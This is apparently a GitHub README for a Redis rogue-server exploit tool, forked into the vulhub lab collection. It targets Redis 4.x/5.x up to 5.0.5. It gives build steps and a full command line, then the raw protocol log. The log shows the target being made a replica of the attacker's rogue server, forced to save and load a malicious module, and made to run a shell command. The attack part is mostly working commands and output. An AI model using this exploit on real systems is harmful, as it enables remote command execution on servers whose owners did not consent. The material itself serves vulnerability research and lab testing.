Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

vulhub/redis-rogue-getshell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

4 Commits

Repository files navigation

Redis Rogue Server

Forking and refactoring from https://github.com/n0b0dyCN/redis-rogue-server

A exploit for Redis(<=5.0.5) RCE, inspired by Redis post-exploitation.

Requirements

Python 3.x

Usage

Compile exploit:

cd RedisModulesSDK/
make

Then, exp.so is in RedisModulesSDK/exp.so.

Help:

➜ python3 redis-master.py -h
usage: redis-master.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE]
 [-c COMMAND] [-a AUTH] [-v]
Redis 4.x/5.x RCE with RedisModules
optional arguments:
 -h, --help show this help message and exit
 -r RHOST, --rhost RHOST
 target host
 -p RPORT, --rport RPORT
 target redis port, default 6379
 -L LHOST, --lhost LHOST
 rogue server ip
 -P LPORT, --lport LPORT
 rogue server listen port, default 21000
 -f FILE, --file FILE RedisModules to load, default exp.so
 -c COMMAND, --command COMMAND
 Command that you want to execute
 -a AUTH, --auth AUTH redis password

Execute command:

➜ python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"
>> send data: b'*3\r\n7ドル\r\nSLAVEOF\r\n13ドル\r\n*.*.*.*\r\n4ドル\r\n8888\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n6ドル\r\nCONFIG\r\n3ドル\r\nSET\r\n10ドル\r\ndbfilename\r\n6ドル\r\nexp.so\r\n'
>> receive data: b'+OK\r\n'
>> receive data: b'PING\r\n'
>> receive data: b'REPLCONF listening-port 6379\r\n'
>> receive data: b'REPLCONF capa eof capa psync2\r\n'
>> receive data: b'PSYNC 7cce9210b3ad3f54043ce1965cda506bd26b0224 1\r\n'
>> send data: b'*3\r\n6ドル\r\nMODULE\r\n4ドル\r\nLOAD\r\n8ドル\r\n./exp.so\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*3\r\n7ドル\r\nSLAVEOF\r\n2ドル\r\nNO\r\n3ドル\r\nONE\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*4\r\n6ドル\r\nCONFIG\r\n3ドル\r\nSET\r\n10ドル\r\ndbfilename\r\n8ドル\r\ndump.rdb\r\n'
>> receive data: b'+OK\r\n'
>> send data: b'*2\r\n11ドル\r\nsystem.exec\r\n2ドル\r\nid\r\n'
>> receive data: b'49ドル\r\n\x08uid=999(redis) gid=999(redis) groups=999(redis)\n\r\n'
uid=999(redis) gid=999(redis) groups=999(redis)
>> send data: b'*3\r\n6ドル\r\nMODULE\r\n6ドル\r\nUNLOAD\r\n6ドル\r\nsystem\r\n'
>> receive data: b'+OK\r\n'

Screenshot:

Thanks

About

redis 4.x/5.x master/slave getshell module

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

AltStyle によって変換されたページ (->オリジナル) /